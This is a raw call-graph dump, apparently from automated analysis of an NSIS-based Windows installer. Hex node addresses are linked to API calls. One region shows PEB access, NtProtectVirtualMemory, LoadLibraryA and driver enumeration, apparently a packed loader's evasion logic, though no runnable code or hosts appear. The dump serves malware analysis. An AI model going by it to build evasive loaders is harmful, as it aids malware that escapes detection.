GetSystemDirectoryW 7417->7423 7424 4066a2 GetWindowsDirectoryW 7417->7424 7425 4066d1 SHGetSpecialFolderLocation 7417->7425 7426 406719 lstrcatW 7417->7426 7427 40657a 10 API calls 7417->7427 7428 4067c4 5 API calls 7417->7428 7439 40640b 7417->7439 7444 406484 wsprintfW 7417->7444 7445 40653d lstrcpynW 7417->7445 7418->7417 7422->7418 7423->7417 7424->7417 7425->7417 7429 4066e9 SHGetPathFromIDListW CoTaskMemFree 7425->7429 7426->7417 7427->7417 7428->7417 7429->7417 7437 4067d1 7430->7437 7431 40684c CharPrevW 7435 406847 7431->7435 7432 40683a CharNextW 7432->7435 7432->7437 7433 40686d 7433->7371 7435->7431 7435->7433 7436 406826 CharNextW 7436->7437 7437->7432 7437->7435 7437->7436 7438 406835 CharNextW 7437->7438 7451 405e39 7437->7451 7438->7432 7447 4063aa 7439->7447 7442 40646f 7442->7417 7443 40643f RegQueryValueExW RegCloseKey 7443->7442 7444->7417 7445->7417 7446->7415 7448 4063b9 7447->7448 7449 4063c2 RegOpenKeyExW 7448->7449 7450 4063bd 7448->7450 7449->7450 7450->7442 7450->7443 7452 405e3f 7451->7452 7453 405e55 7452->7453 7454 405e46 CharNextW 7452->7454 7453->7437 7454->7452 7504 40653d lstrcpynW 7455->7504 7457 405f25 7505 405eb7 CharNextW CharNextW 7457->7505 7459 405c69 7459->7376 7459->7377 7461 4067c4 5 API calls 7467 405f3b 7461->7467 7462 405f6c lstrlenW 7463 405f77 7462->7463 7462->7467 7465 405e0c 3 API calls 7463->7465 7464 406873 2 API calls 7464->7467 7466 405f7c GetFileAttributesW 7465->7466 7466->7459 7467->7459 7467->7462 7467->7464 7468 405e58 2 API calls 7467->7468 7468->7462 7469->7381 7471 405e66 7470->7471 7472 405e78 7471->7472 7473 405e6c CharPrevW 7471->7473 7472->7385 7473->7471 7473->7472 7474->7411 7511 406008 GetFileAttributesW 7475->7511 7477 405c2e 7477->7411 7479 405c24 DeleteFileW 7481 405c2a 7479->7481 7480 405c1c RemoveDirectoryW 7480->7481 7481->7477 7482 405c3a SetFileAttributesW 7481->7482 7482->7477 7484 4055ba 7483->7484 7493 40565c 7483->7493 7485 4055d6 lstrlenW 7484->7485 7486 40657a 17 API calls 7484->7486 7487 4055e4 lstrlenW 7485->7487 7488 4055ff 7485->7488 7486->7485 7489 4055f6 lstrcatW 7487->7489 7487->7493 7490 405612 7488->7490 7491 405605 SetWindowTextW 7488->7491 7489->7488 7492 405618 SendMessageW SendMessageW SendMessageW 7490->7492 7490->7493 7491->7490 7492->7493 7493->7411 7495 40631e 7494->7495 7496 406311 7494->7496 7495->7411 7514 406183 7496->7514 7499 405dcd 7498->7499 7500 406889 FindClose 7498->7500 7499->7378 7499->7391 7500->7499 7502 405dd7 7501->7502 7503 405e28 lstrcatW 7501->7503 7502->7396 7503->7502 7504->7457 7506 405ed4 7505->7506 7507 405ee6 7505->7507 7506->7507 7508 405ee1 CharNextW 7506->7508 7509 405e39 CharNextW 7507->7509 7510 405f0a 7507->7510 7508->7510 7509->7507 7510->7459 7510->7461 7512 405c0d 7511->7512 7513 40601a SetFileAttributesW 7511->7513 7512->7477 7512->7479 7512->7480 7513->7512 7515 4061b3 7514->7515 7516 4061d9 GetShortPathNameW 7514->7516 7541 40602d GetFileAttributesW CreateFileW 7515->7541 7518 4062f8 7516->7518 7519 4061ee 7516->7519 7518->7495 7519->7518 7521 4061f6 wsprintfA 7519->7521 7520 4061bd CloseHandle GetShortPathNameW 7520->7518 7522 4061d1 7520->7522 7523 40657a 17 API calls 7521->7523 7522->7516 7522->7518 7524 40621e 7523->7524 7542 40602d GetFileAttributesW CreateFileW 7524->7542 7526 40622b 7526->7518 7527 40623a GetFileSize GlobalAlloc 7526->7527 7528 4062f1 CloseHandle 7527->7528 7529 40625c 7527->7529 7528->7518 7543 4060b0 ReadFile 7529->7543 7534 40627b lstrcpyA 7537 40629d 7534->7537 7535 40628f 7536 405f92 4 API calls 7535->7536 7536->7537 7538 4062d4 SetFilePointer 7537->7538 7550 4060df WriteFile 7538->7550 7541->7520 7542->7526 7544 4060ce 7543->7544 7544->7528 7545 405f92 lstrlenA 7544->7545 7546 405fd3 lstrlenA 7545->7546 7547 405fac lstrcmpiA 7546->7547 7548 405fdb 7546->7548 7547->7548 7549 405fca CharNextA 7547->7549 7548->7534 7548->7535 7549->7546 7551 4060fd GlobalFree 7550->7551 7551->7528 8554 401c43 8555 402d84 17 API calls 8554->8555 8556 401c4a 8555->8556 8557 402d84 17 API calls 8556->8557 8558 401c57 8557->8558 8559 401c6c 8558->8559 8560 402da6 17 API calls 8558->8560 8561 401c7c 8559->8561 8562 402da6 17 API calls 8559->8562 8560->8559 8563 401cd3 8561->8563 8564 401c87 8561->8564 8562->8561 8565 402da6 17 API calls 8563->8565 8566 402d84 17 API calls 8564->8566 8567 401cd8 8565->8567 8568 401c8c 8566->8568 8570 402da6 17 API calls 8567->8570 8569 402d84 17 API calls 8568->8569 8571 401c98 8569->8571 8572 401ce1 FindWindowExW 8570->8572 8573 401cc3 SendMessageW 8571->8573 8574 401ca5 SendMessageTimeoutW 8571->8574 8575 401d03 8572->8575 8573->8575 8574->8575 9080 404943 9081 404953 9080->9081 9082 404979 9080->9082 9084 404499 18 API calls 9081->9084 9083 404500 8 API calls 9082->9083 9085 404985 9083->9085 9086 404960 SetDlgItemTextW 9084->9086 9086->9082 9087 2b61bb1 9088 2b61bb6 9087->9088 9090 2b61bcf 9087->9090 9091 2b6b670 9088->9091 9092 2b6b6aa 9091->9092 9093 2b6bbf6 LoadLibraryA 9092->9093 9094 2b6b821 9092->9094 9095 2b6bbda 9092->9095 9103 2b66043 9092->9103 9096 2b6bc13 10 API calls 9093->9096 9094->9090 9097 2b6c27d 10 API calls 9095->9097 9098 2b6bc03 9096->9098 9099 2b6bbe5 9097->9099 9098->9090 9100 2b6bc13 10 API calls 9099->9100 9101 2b6bbf1 9100->9101 9101->9093 9102 2b6f5a0 9102->9090 9103->9102 9104 2b6ef1d 10 API calls 9103->9104 9105 2b6edc0 K32EnumDeviceDrivers 9104->9105 9106 2b6ee17 9105->9106 7803 2b5e0b8 7806 2b6d810 7803->7806 7805 2b5e0bd 7851 2b6bb14 7806->7851 7808 2b6d824 7809 2b6bb14 12 API calls 7808->7809 7810 2b6d83a 7809->7810 7811 2b6d86c GetPEB 7810->7811 7813 2b5e309 7810->7813 7812 2b6d8c3 7811->7812 7868 2b6e616 7812->7868 7813->7805 7815 2b6bbf6 LoadLibraryA 7813->7815 7816 2b6bbda 7813->7816 7833 2b5e3e1 7813->7833 7817 2b6bc13 10 API calls 7815->7817 7818 2b6c27d 10 API calls 7816->7818 7819 2b6bc03 7817->7819 7820 2b6bbe5 7818->7820 7819->7805 7821 2b6bc13 10 API calls 7820->7821 7822 2b6bbf1 7821->7822 7822->7815 7823 2b6f5a0 7823->7805 7825 2b6e0d1 7828 2b6e193 7825->7828 7829 2b6e3c7 7825->7829 7826 2b6e616 NtProtectVirtualMemory 7827 2b6e611 7826->7827 7827->7805 7831 2b5e358 7828->7831 7832 2b6e1b8 7828->7832 7829->7826 7830 2b6dc5c 7840 2b6e616 NtProtectVirtualMemory 7830->7840 7831->7805 7831->7813 7831->7833 7835 2b5e3dc 7831->7835 7837 2b6bb14 12 API calls 7831->7837 7845 2b628e7 7831->7845 7866 2b6ebee 7831->7866 7832->7833 7834 2b6e354 7832->7834 7833->7823 7836 2b6ef1d 10 API calls 7833->7836 7839 2b6e616 NtProtectVirtualMemory 7834->7839 7835->7805 7838 2b6edc0 K32EnumDeviceDrivers 7836->7838 7837->7831 7843 2b6ee17 7838->7843 7841 2b6e3c4 7839->7841 7842 2b6e0cb 7840->7842 7841->7805 7842->7805 7845->7813 7846 2b629a1 7845->7846 7848 2b6ebee 11 API calls 7846->7848 7849 2b62a1e 7846->7849 7847 2b62bc3 7847->7805 7848->7849 7849->7847 7850 2b6ebee 11 API calls 7849->7850 7850->7847 7851->7851 7852 2b6bb28 7851->7852 7853 2b6bbf6 LoadLibraryA 7852->7853 7854 2b6bbda 7852->7854 7862 2b66043 7852->7862 7855 2b6bc13 10 API calls 7853->7855 7856 2b6c27d 10 API calls 7854->7856 7857 2b6bc03 7855->7857 7858 2b6bbe5 7856->7858 7857->7808 7859 2b6bc13 10 API calls 7858->7859 7860 2b6bbf1 7859->7860 7860->7853 7861 2b6f5a0 7861->7808 7862->7861 7863 2b6ef1d 10 API calls 7862->7863 7864 2b6edc0 K32EnumDeviceDrivers 7863->7864 7865 2b6ee17 7864->7865 7871 2b6ebf3 7866->7871 7869 2b6e697 NtProtectVirtualMemory 7868->7869 7870 2b6d94f 7869->7870 7870->7825 7870->7830 7870->7842 7872 2b66043 7871->7872 7872->7871 7873 2b6ef1d 10 API calls 7872->7873 7874 2b6edc0 K32EnumDeviceDrivers 7873->7874 7875 2b6ee17 7874->7875 8576 401e4e GetDC 8577 402d84 17 API calls 8576->8577 8578 401e60 GetDeviceCaps MulDiv ReleaseDC 8577->8578 8579 402d84 17 API calls 8578->8579 8580 401e91 8579->8580 8581 40657a 17 API calls 8580->8581 8582 401ece CreateFontIndirectW 8581->8582 8583 402638 8582->8583 8583->8583 9107 402950 9108 402da6 17 API calls 9107->9108 9110 40295c 9108->9110 9109 402972 9112 406008 2 API calls 9109->9112 9110->9109 9111 402da6 17 API calls 9110->9111 9111->9109 9113 402978 9112->9113 9135 40602d GetFileAttributesW CreateFileW 9113->9135 9115 402985 9116 402a3b 9115->9116 9119 4029a0 GlobalAlloc 9115->9119 9120 402a23 9115->9120 9117 402a42 DeleteFileW 9116->9117 9118 402a55 9116->9118 9117->9118 9119->9120 9121 4029b9 9119->9121 9122 4032b4 31 API calls 9120->9122 9136 4034e5 SetFilePointer 9121->9136 9124 402a30 CloseHandle 9122->9124 9124->9116 9125 4029bf 9126 4034cf ReadFile 9125->9126 9127 4029c8 GlobalAlloc 9126->9127 9128 4029d8 9127->9128 9129 402a0c 9127->9129 9130 4032b4 31 API calls 9128->9130 9131 4060df WriteFile 9129->9131 9134 4029e5 9130->9134 9132 402a18 GlobalFree 9131->9132 9132->9120 9133 402a03 GlobalFree 9133->9129 9134->9133 9135->9115 9136->9125 9141 401956 9142 402da6 17 API calls 9141->9142 9143 40195d lstrlenW 9142->9143 9144 402638 9143->9144 9144->9144 8584 404658 8585 404670 8584->8585 8589 40478a 8584->8589 8590 404499 18 API calls 8585->8590 8586 4047f4 8587 4048be 8586->8587 8588 4047fe GetDlgItem 8586->8588 8592 404500 8 API calls 8587->8592 8593 404818 8588->8593 8594 40487f 8588->8594 8589->8586 8589->8587 8595 4047c5 GetDlgItem SendMessageW 8589->8595 8591 4046d7 8590->8591 8596 404499 18 API calls 8591->8596 8597 4048b9 8592->8597 8593->8594 8598 40483e SendMessageW LoadCursorW SetCursor 8593->8598 8594->8587 8599 404891 8594->8599 8617 4044bb EnableWindow 8595->8617 8601 4046e4 CheckDlgButton 8596->8601 8621 404907 8598->8621 8603 4048a7 8599->8603 8604 404897 SendMessageW 8599->8604 8615 4044bb EnableWindow 8601->8615 8603->8597 8609 4048ad SendMessageW 8603->8609 8604->8603 8605 4047ef 8618 4048e3 8605->8618 8609->8597 8610 404702 GetDlgItem 8616 4044ce SendMessageW 8610->8616 8612 404718 SendMessageW 8613 404735 GetSysColor 8612->8613 8614 40473e SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 8612->8614 8613->8614 8614->8597 8615->8610 8616->8612 8617->8605 8619 4048f1 8618->8619 8620 4048f6 SendMessageW 8618->8620 8619->8620 8620->8586 8624 405b63 ShellExecuteExW 8621->8624 8623 40486d LoadCursorW SetCursor 8623->8594 8624->8623 9174 402b59 9175 402b60 9174->9175 9176 402bab 9174->9176 9179 402d84 17 API calls 9175->9179 9182 402ba9 9175->9182 9177 40690a 5 API calls 9176->9177 9178 402bb2 9177->9178 9180 402da6 17 API calls 9178->9180 9181 402b6e 9179->9181 9183 402bbb 9180->9183 9184 402d84 17 API calls 9181->9184 9183->9182 9185 402bbf IIDFromString 9183->9185 9187 402b7a 9184->9187 9185->9182 9186 402bce 9185->9186 9186->9182 9192 40653d lstrcpynW 9186->9192 9191 406484 wsprintfW 9187->9191 9190 402beb CoTaskMemFree 9190->9182 9191->9182 9192->9190 8528 40175c 8529 402da6 17 API calls 8528->8529 8530 401763 8529->8530 8531 40605c 2 API calls 8530->8531 8532 40176a 8531->8532 8533 40605c 2 API calls 8532->8533 8533->8532 9193 401d5d 9194 402d84 17 API calls 9193->9194 9195 401d6e SetWindowLongW 9194->9195 9196 402c2a 9195->9196 9197 2b64f94 GetPEB 9198 2b64fd4 9197->9198 9199 2b6f513 11 API calls 9198->9199 9200 2b6522a 9198->9200 9199->9200 9201 401563 9202 402ba4 9201->9202 9205 406484 wsprintfW 9202->9205 9204 402ba9 9205->9204 9206 2b61591 9207 2b61606 9206->9207 9208 2b6ebee 11 API calls 9207->9208 9209 2b6161a 9208->9209 9210 2b6ebee 11 API calls 9209->9210 9211 2b61663 9210->9211 9212 401968 9213 402d84 17 API calls 9212->9213 9214 40196f 9213->9214 9215 402d84 17 API calls 9214->9215 9216 40197c 9215->9216 9217 402da6 17 API calls 9216->9217 9218 401993 lstrlenW 9217->9218 9220 4019a4 9218->9220 9219 4019e5 9220->9219 9224 40653d lstrcpynW 9220->9224 9222 4019d5 9222->9219 9223 4019da lstrlenW 9222->9223 9223->9219 9224->9222 8629 40166a 8630 402da6 17 API calls 8629->8630 8631 401670 8630->8631 8632 406873 2 API calls 8631->8632 8633 401676 8632->8633 8134 2b5e19a 8135 2b5e19c EnumWindows 8134->8135 8136 40176f 8137 402da6 17 API calls 8136->8137 8138 401776 8137->8138 8139 401796 8138->8139 8140 40179e 8138->8140 8175 40653d lstrcpynW 8139->8175 8176 40653d lstrcpynW 8140->8176 8143 4017a9 8145 405e0c 3 API calls 8143->8145 8144 40179c 8147 4067c4 5 API calls 8144->8147 8146 4017af lstrcatW 8145->8146 8146->8144 8151 4017bb 8147->8151 8148 406873 2 API calls 8148->8151 8149 406008 2 API calls 8149->8151 8151->8148 8151->8149 8152 4017cd CompareFileTime 8151->8152 8153 40188d 8151->8153 8156 40653d lstrcpynW 8151->8156 8161 40657a 17 API calls 8151->8161 8170 405b9d MessageBoxIndirectW 8151->8170 8173 401864 8151->8173 8174 40602d GetFileAttributesW CreateFileW 8151->8174 8152->8151 8154 40559f 24 API calls 8153->8154 8157 401897 8154->8157 8155 40559f 24 API calls 8171 401879 8155->8171 8156->8151 8158 4032b4 31 API calls 8157->8158 8159 4018aa 8158->8159 8160 4018be SetFileTime 8159->8160 8162 4018d0 CloseHandle 8159->8162 8160->8162 8161->8151 8163 4018e1 8162->8163 8162->8171 8164 4018e6 8163->8164 8165 4018f9 8163->8165 8167 40657a 17 API calls 8164->8167 8166 40657a 17 API calls 8165->8166 8169 401901 8166->8169 8168 4018ee lstrcatW 8167->8168 8168->8169 8169->8171 8172 405b9d MessageBoxIndirectW 8169->8172 8170->8151 8172->8171 8173->8155 8173->8171 8174->8151 8175->8144 8176->8143 8634 401a72 8635 402d84 17 API calls 8634->8635 8636 401a7b 8635->8636 8637 402d84 17 API calls 8636->8637 8638 401a20 8637->8638 9225 401573 9226 401583 ShowWindow 9225->9226 9227 40158c 9225->9227 9226->9227 9228 402c2a 9227->9228 9229 40159a ShowWindow 9227->9229 9229->9228 9230 401b77 9231 402da6 17 API calls 9230->9231 9232 401b7e 9231->9232 9233 402d84 17 API calls 9232->9233 9234 401b87 wsprintfW 9233->9234 9235 402c2a 9234->9235 8514 40167b 8515 402da6 17 API calls 8514->8515 8516 401682 8515->8516 8517 402da6 17 API calls 8516->8517 8518 40168b 8517->8518 8519 402da6 17 API calls 8518->8519 8520 401694 MoveFileW 8519->8520 8521 4016a7 8520->8521 8527 4016a0 8520->8527 8522 4022f6 8521->8522 8523 406873 2 API calls 8521->8523 8525 4016b6 8523->8525 8524 401423 24 API calls 8524->8522 8525->8522 8526 4062fd 36 API calls 8525->8526 8526->8527 8527->8524 8639 401000 8640 401037 BeginPaint GetClientRect 8639->8640 8641 40100c DefWindowProcW 8639->8641 8643 4010f3 8640->8643 8644 401179 8641->8644 8645 401073 CreateBrushIndirect FillRect DeleteObject 8643->8645 8646 4010fc 8643->8646 8645->8643 8647 401102 CreateFontIndirectW 8646->8647 8648 401167 EndPaint 8646->8648 8647->8648 8649 401112 6 API calls 8647->8649 8648->8644 8649->8648 9236 401503 9237 40151e 9236->9237 9238 40150b 9236->9238 9239 402d84 17 API calls 9238->9239 9239->9237 7718 402c05 SendMessageW 7719 402c2a 7718->7719 7720 402c1f InvalidateRect 7718->7720 7720->7719 9246 404f06 GetDlgItem GetDlgItem 9247 404f58 7 API calls 9246->9247 9252 40517d 9246->9252 9248 404ff2 SendMessageW 9247->9248 9249 404fff DeleteObject 9247->9249 9248->9249 9250 405008 9249->9250 9251 40503f 9250->9251 9253 40657a 17 API calls 9250->9253 9254 404499 18 API calls 9251->9254 9256 40525f 9252->9256 9280 4051ec 9252->9280 9300 404e54 SendMessageW 9252->9300 9259 405021 SendMessageW SendMessageW 9253->9259 9260 405053 9254->9260 9255 40530b 9257 405315 SendMessageW 9255->9257 9258 40531d 9255->9258 9256->9255 9265 4052b8 SendMessageW 9256->9265 9289 405170 9256->9289 9257->9258 9268 405336 9258->9268 9269 40532f ImageList_Destroy 9258->9269 9277 405346 9258->9277 9259->9250 9264 404499 18 API calls 9260->9264 9261 405251 SendMessageW 9261->9256 9262 404500 8 API calls 9267 40550c 9262->9267 9276 405064 9264->9276 9266 4052cd SendMessageW 9265->9266 9265->9289 9271 4052e0 9266->9271 9272 40533f GlobalFree 9268->9272 9268->9277 9269->9268 9270 4054c0 9274 4054d2 ShowWindow GetDlgItem ShowWindow 9270->9274 9270->9289 9282 4052f1 SendMessageW 9271->9282 9272->9277 9273 40513f GetWindowLongW SetWindowLongW 9275 405158 9273->9275 9274->9289 9278 405175 9275->9278 9279 40515d ShowWindow 9275->9279 9276->9273 9281 4050b7 SendMessageW 9276->9281 9283 40513a 9276->9283 9286 4050f5 SendMessageW 9276->9286 9287 405109 SendMessageW 9276->9287 9277->9270 9292 405381 9277->9292 9305 404ed4 9277->9305 9299 4044ce SendMessageW 9278->9299 9298 4044ce SendMessageW 9279->9298 9280->9256 9280->9261 9281->9276 9282->9255 9283->9273 9283->9275 9286->9276 9287->9276 9289->9262 9290 40548b 9291 405496 InvalidateRect 9290->9291 9294 4054a2 9290->9294 9291->9294 9293 4053af SendMessageW 9292->9293 9297 4053c5 9292->9297 9293->9297 9294->9270 9314 404e0f 9294->9314 9296 405439 SendMessageW SendMessageW 9296->9297 9297->9290 9297->9296 9298->9289 9299->9252 9301 404eb3 SendMessageW 9300->9301 9302 404e77 GetMessagePos ScreenToClient SendMessageW 9300->9302 9303 404eab 9301->9303 9302->9303 9304 404eb0 9302->9304 9303->9280 9304->9301 9317 40653d lstrcpynW 9305->9317 9307 404ee7 9318 406484 wsprintfW 9307->9318 9309 404ef1 9310 40140b 2 API calls 9309->9310 9311 404efa 9310->9311 9319 40653d lstrcpynW 9311->9319 9313 404f01 9313->9292 9320 404d46 9314->9320 9316 404e24 9316->9270 9317->9307 9318->9309 9319->9313 9321 404d5f 9320->9321 9322 40657a 17 API calls 9321->9322 9323 404dc3 9322->9323 9324 40657a 17 API calls 9323->9324 9325 404dce 9324->9325 9326 40657a 17 API calls 9325->9326 9327 404de4 lstrlenW wsprintfW SetDlgItemTextW 9326->9327 9327->9316 8675 404609 lstrlenW 8676 404628 8675->8676 8677 40462a WideCharToMultiByte 8675->8677 8676->8677 7793 40290b 7794 402da6 17 API calls 7793->7794 7795 402912 FindFirstFileW 7794->7795 7796 402925 7795->7796 7797 40293a 7795->7797 7798 402943 7797->7798 7801 406484 wsprintfW 7797->7801 7802 40653d lstrcpynW 7798->7802 7801->7798 7802->7796 9328 40190c 9329 401943 9328->9329 9330 402da6 17 API calls 9329->9330 9331 401948 9330->9331 9332 405c49 67 API calls 9331->9332 9333 401951 9332->9333 9334 40190f 9335 402da6 17 API calls 9334->9335 9336 401916 9335->9336 9337 405b9d MessageBoxIndirectW 9336->9337 9338 40191f 9337->9338 9339 401f12 9340 402da6 17 API calls 9339->9340 9341 401f18 9340->9341 9342 402da6 17 API calls 9341->9342 9343 401f21 9342->9343 9344 402da6 17 API calls 9343->9344 9345 401f2a 9344->9345 9346 402da6 17 API calls 9345->9346 9347 401f33 9346->9347 9348 401423 24 API calls 9347->9348 9349 401f3a 9348->9349 9356 405b63 ShellExecuteExW 9349->9356 9351 401f82 9352 4069b5 5 API calls 9351->9352 9354 40292e 9351->9354 9353 401f9f CloseHandle 9352->9353 9353->9354 9356->9351 9357 405513 9358 405523 9357->9358 9359 405537 9357->9359 9360 405529 9358->9360 9369 405580 9358->9369 9361 40553f IsWindowVisible 9359->9361 9365 405556 9359->9365 9363 4044e5 SendMessageW 9360->9363 9364 40554c 9361->9364 9361->9369 9362 405585 CallWindowProcW 9366 405533 9362->9366 9363->9366 9367 404e54 5 API calls 9364->9367 9365->9362 9368 404ed4 4 API calls 9365->9368 9367->9365 9368->9369 9369->9362 8679 70b510e1 8689 70b51111 8679->8689 8680 70b512b0 GlobalFree 8681 70b51240 GlobalFree 8681->8689 8682 70b511d7 GlobalAlloc 8682->8689 8683 70b512ab 8683->8680 8684 70b5135a 2 API calls 8684->8689 8685 70b5129a GlobalFree 8685->8689 8686 70b51312 2 API calls 8686->8689 8687 70b5116b GlobalAlloc 8687->8689 8688 70b51381 lstrcpyW 8688->8689 8689->8680 8689->8681 8689->8682 8689->8683 8689->8684 8689->8685 8689->8686 8689->8687 8689->8688 9370 401d17 9371 402d84 17 API calls 9370->9371 9372 401d1d IsWindow 9371->9372 9373 401a20 9372->9373 8694 40261c 8695 402da6 17 API calls 8694->8695 8696 402623 8695->8696 8699 40602d GetFileAttributesW CreateFileW 8696->8699 8698 40262f 8699->8698 9374 70b523e9 9375 70b52453 9374->9375 9376 70b5245e GlobalAlloc 9375->9376 9377 70b5247d 9375->9377 9376->9375 8700 2b604e9 8701 2b60505 8700->8701 8704 2b62647 8701->8704 8703 2b6063c 8721 2b5e358 8704->8721 8705 2b6bbf6 LoadLibraryA 8708 2b6bc13 10 API calls 8705->8708 8706 2b5e309 8706->8703 8706->8705 8707 2b6bbda 8706->8707 8716 2b5e3e1 8706->8716 8709 2b6c27d 10 API calls 8707->8709 8710 2b6bc03 8708->8710 8711 2b6bbe5 8709->8711 8710->8703 8712 2b6bc13 10 API calls 8711->8712 8713 2b6bbf1 8712->8713 8713->8705 8714 2b6f5a0 8714->8703 8715 2b6ebee 11 API calls 8715->8721 8716->8714 8717 2b6ef1d 10 API calls 8716->8717 8718 2b6edc0 K32EnumDeviceDrivers 8717->8718 8719 2b6ee17 8718->8719 8720 2b628e7 8720->8706 8722 2b629a1 8720->8722 8721->8703 8721->8704 8721->8706 8721->8715 8721->8716 8721->8720 8723 2b5e3dc 8721->8723 8724 2b6bb14 12 API calls 8721->8724 8726 2b6ebee 11 API calls 8722->8726 8727 2b62a1e 8722->8727 8723->8703 8724->8721 8725 2b62bc3 8725->8703 8726->8727 8727->8725 8728 2b6ebee 11 API calls 8727->8728 8728->8725 8729 2b60cd4 GetPEB 8732 2b60d0b 8729->8732 8730 2b6133c 8731 2b6f513 11 API calls 8731->8732 8732->8730 8732->8731 7776 40252a 7787 402de6 7776->7787 7779 402da6 17 API calls 7780 40253d 7779->7780 7781 402548 RegQueryValueExW 7780->7781 7786 40292e 7780->7786 7782 40256e RegCloseKey 7781->7782 7783 402568 7781->7783 7782->7786 7783->7782 7792 406484 wsprintfW 7783->7792 7788 402da6 17 API calls 7787->7788 7789 402dfd 7788->7789 7790 4063aa RegOpenKeyExW 7789->7790 7791 402534 7790->7791 7791->7779 7792->7782 8733 40202a 8734 402da6 17 API calls 8733->8734 8735 402031 8734->8735 8736 40690a 5 API calls 8735->8736 8737 402040 8736->8737 8738 40205c GlobalAlloc 8737->8738 8740 4020cc 8737->8740 8739 402070 8738->8739 8738->8740 8741 40690a 5 API calls 8739->8741 8742 402077 8741->8742 8743 40690a 5 API calls 8742->8743 8744 402081 8743->8744 8744->8740 8748 406484 wsprintfW 8744->8748 8746 4020ba 8749 406484 wsprintfW 8746->8749 8748->8746 8749->8740 8750 2b5f2d9 8751 2b5f332 8750->8751 8752 2b6bb14 12 API calls 8751->8752 8753 2b5f348 8752->8753 7876 40352d SetErrorMode GetVersionExW 7877 4035b7 7876->7877 7878 40357f GetVersionExW 7876->7878 7879 403610 7877->7879 7880 40690a 5 API calls 7877->7880 7878->7877 7881 40689a 3 API calls 7879->7881 7880->7879 7882 403626 lstrlenA 7881->7882 7882->7879 7883 403636 7882->7883 7884 40690a 5 API calls 7883->7884 7885 40363d 7884->7885 7886 40690a 5 API calls 7885->7886 7887 403644 7886->7887 7888 40690a 5 API calls 7887->7888 7889 403650 #17 OleInitialize SHGetFileInfoW 7888->7889 7967 40653d lstrcpynW 7889->7967 7892 40369d GetCommandLineW 7968 40653d lstrcpynW 7892->7968 7894 4036af 7895 405e39 CharNextW 7894->7895 7896 4036d5 CharNextW 7895->7896 7906 4036e6 7896->7906 7897 4037e4 7898 4037f8 GetTempPathW 7897->7898 7969 4034fc 7898->7969 7900 403810 7901 403814 GetWindowsDirectoryW lstrcatW 7900->7901 7902 40386a DeleteFileW 7900->7902 7904 4034fc 12 API calls 7901->7904 7979 40307d GetTickCount GetModuleFileNameW 7902->7979 7903 405e39 CharNextW 7903->7906 7907 403830 7904->7907 7906->7897 7906->7903 7911 4037e6 7906->7911 7907->7902 7910 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 7907->7910 7908 40387d 7909 403941 7908->7909 7912 403932 7908->7912 7916 405e39 CharNextW 7908->7916 8068 403b12 7909->8068 7915 4034fc 12 API calls 7910->7915 8063 40653d lstrcpynW 7911->8063 8007 403bec 7912->8007 7919 403862 7915->7919 7932 40389f 7916->7932 7919->7902 7919->7909 7920 403a69 8075 405b9d 7920->8075 7921 403a7e 7923 403a86 GetCurrentProcess OpenProcessToken 7921->7923 7924 403afc ExitProcess 7921->7924 7929 403acc 7923->7929 7930 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 7923->7930 7926 403908 7934 405f14 18 API calls 7926->7934 7927 403949 7933 405b08 5 API calls 7927->7933 7931 40690a 5 API calls 7929->7931 7930->7929 7935 403ad3 7931->7935 7932->7926 7932->7927 7936 40394e lstrcatW 7933->7936 7937 403914 7934->7937 7938 403ae8 ExitWindowsEx 7935->7938 7941 403af5 7935->7941 7939 40396a lstrcatW lstrcmpiW 7936->7939 7940 40395f lstrcatW 7936->7940 7937->7909 8064 40653d lstrcpynW 7937->8064 7938->7924 7938->7941 7939->7909 7942 40398a 7939->7942 7940->7939 8079 40140b 7941->8079 7945 403996 7942->7945 7946 40398f 7942->7946 7950 405aeb 2 API calls 7945->7950 7949 405a6e 4 API calls 7946->7949 7947 403927 8065 40653d lstrcpynW 7947->8065 7952 403994 7949->7952 7951 40399b SetCurrentDirectoryW 7950->7951 7953 4039b8 7951->7953 7954 4039ad 7951->7954 7952->7951 8067 40653d lstrcpynW 7953->8067 8066 40653d lstrcpynW 7954->8066 7957 40657a 17 API calls 7958 4039fa DeleteFileW 7957->7958 7959 403a06 CopyFileW 7958->7959 7964 4039c5 7958->7964 7959->7964 7960 403a50 7961 4062fd 36 API calls 7960->7961 7961->7909 7962 4062fd 36 API calls 7962->7964 7963 40657a 17 API calls 7963->7964 7964->7957 7964->7960 7964->7962 7964->7963 7965 405b20 2 API calls 7964->7965 7966 403a3a CloseHandle 7964->7966 7965->7964 7966->7964 7967->7892 7968->7894 7970 4067c4 5 API calls 7969->7970 7972 403508 7970->7972 7971 403512 7971->7900 7972->7971 7973 405e0c 3 API calls 7972->7973 7974 40351a 7973->7974 7975 405aeb 2 API calls 7974->7975 7976 403520 7975->7976 8082 40605c 7976->8082 8086 40602d GetFileAttributesW CreateFileW 7979->8086 7981 4030bd 8000 4030cd 7981->8000 8087 40653d lstrcpynW 7981->8087 7983 4030e3 7984 405e58 2 API calls 7983->7984 7985 4030e9 7984->7985 8088 40653d lstrcpynW 7985->8088 7987 4030f4 GetFileSize 7992 40310b 7987->7992 8004 4031ee 7987->8004 7989 4031f7 7991 403227 GlobalAlloc 7989->7991 7989->8000 8101 4034e5 SetFilePointer 7989->8101 7990 4034cf ReadFile 7990->7992 8100 4034e5 SetFilePointer 7991->8100 7992->7990 7993 40325a 7992->7993 7992->8000 8002 403019 6 API calls 7992->8002 7992->8004 7997 403019 6 API calls 7993->7997 7996 403242 7999 4032b4 31 API calls 7996->7999 7997->8000 7998 403210 8001 4034cf ReadFile 7998->8001 8005 40324e 7999->8005 8000->7908 8003 40321b 8001->8003 8002->7992 8003->7991 8003->8000 8089 403019 8004->8089 8005->8000 8006 40328b SetFilePointer 8005->8006 8006->8000 8008 40690a 5 API calls 8007->8008 8009 403c00 8008->8009 8010 403c06 8009->8010 8011 403c18 8009->8011 8110 406484 wsprintfW 8010->8110 8012 40640b 3 API calls 8011->8012 8013 403c48 8012->8013 8015 403c67 lstrcatW 8013->8015 8017 40640b 3 API calls 8013->8017 8016 403c16 8015->8016 8102 403ec2 8016->8102 8017->8015 8020 405f14 18 API calls 8021 403c99 8020->8021 8022 403d2d 8021->8022 8024 40640b 3 API calls 8021->8024 8023 405f14 18 API calls 8022->8023 8025 403d33 8023->8025 8026 403ccb 8024->8026 8027 403d43 LoadImageW 8025->8027 8028 40657a 17 API calls 8025->8028 8026->8022 8032 403cec lstrlenW 8026->8032 8036 405e39 